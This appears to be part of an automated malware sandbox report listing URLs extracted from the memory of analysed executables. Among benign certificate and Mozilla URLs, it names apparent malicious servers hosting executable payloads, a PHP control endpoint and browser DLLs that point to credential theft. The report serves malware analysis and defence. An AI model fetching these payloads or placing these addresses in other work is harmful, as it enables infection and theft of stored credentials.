Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000002.3032979304.0000000001104000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: e192e43b61.exe, 0000000A.00000002.3013027936.000000000084A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe0
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeF
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exev
Source: e192e43b61.exe, 0000000B.00000002.3032599767.0000000001452000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: e192e43b61.exe, 0000000A.00000003.2897509232.00000000011A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe:
Source: file.exe, 00000000.00000003.2004614587.0000000001751000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeencoded
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/t
Source: e192e43b61.exe, 0000000B.00000002.3030925786.00000000013D4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000002.3031046367.0000000001095000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16:80/mine/random.exe
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206-u
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/freebl3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/mozglue.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/msvcp140.dlll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/nss3.dllK
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/softokn3.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dllo
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/sqlite3.dlls
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dll
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0d60be0de163924d/vcruntime140.dllTemp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/1
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/L
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.000000000143E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/a
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php)
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000000C.00000002.2751119481.0000000001933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php2
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php7
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpA
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpCGCBGDBKJJKEBFBFH
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpH
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpP
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpY
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php_
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpd
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpion:
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpj
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpn
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.000000000194E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpp
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpv
Source: b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/h
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, b0b9f39429.exe, 0000001A.00000002.2908035174.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: http://185.215.113.206BFHJK--
Source: b0b9f39429.exe, 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206S
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1786901695.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1732244600.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1872899047.000000000174C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1800136771.00000000016FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: e192e43b61.exe, 0000000D.00000003.2806047135.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2908880792.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2914261433.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2883370297.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2926644946.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2898977300.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2792073053.00000000010D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro(x
Source: e192e43b61.exe, 0000000B.00000003.2824471510.0000000001403000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2883362074.000000000144E000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/dates-and-timesp
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/regular-expressionsXq
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E525000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://exslt.org/stringsp
Source: firefox.exe, 0000001D.00000002.2986603833.000001E762BE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2881911418.000001E762CF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D8A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2884209139.000001E762CF1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2981878374.000001E76137E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76382C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2986971978.000001E762CB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762905000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2887157519.000001E762CC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2985111981.000001E762908000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E763840000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983794051.000001E762703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2982682375.000001E7624C0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2994326472.000001E76380F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shandlerSvc
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001D.00000002.2966624376.000001E75EB7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modu
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EB8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: e192e43b61.exe, 0000000A.00000003.2899300146.0000000001171000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617552023.000000006F89D000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3002770667.000001E764E43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E76374D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2987595176.000001E762D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul.popup-notification-description
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764E96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul:scope
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulApplication
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/locale/safebrowsing/sa
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/printPreviewPag
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ContextualIdenti
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616773453.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.1766547543.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2640183962.00000000057DD000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2784159031.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2847957786.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2995380035.000001E763939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
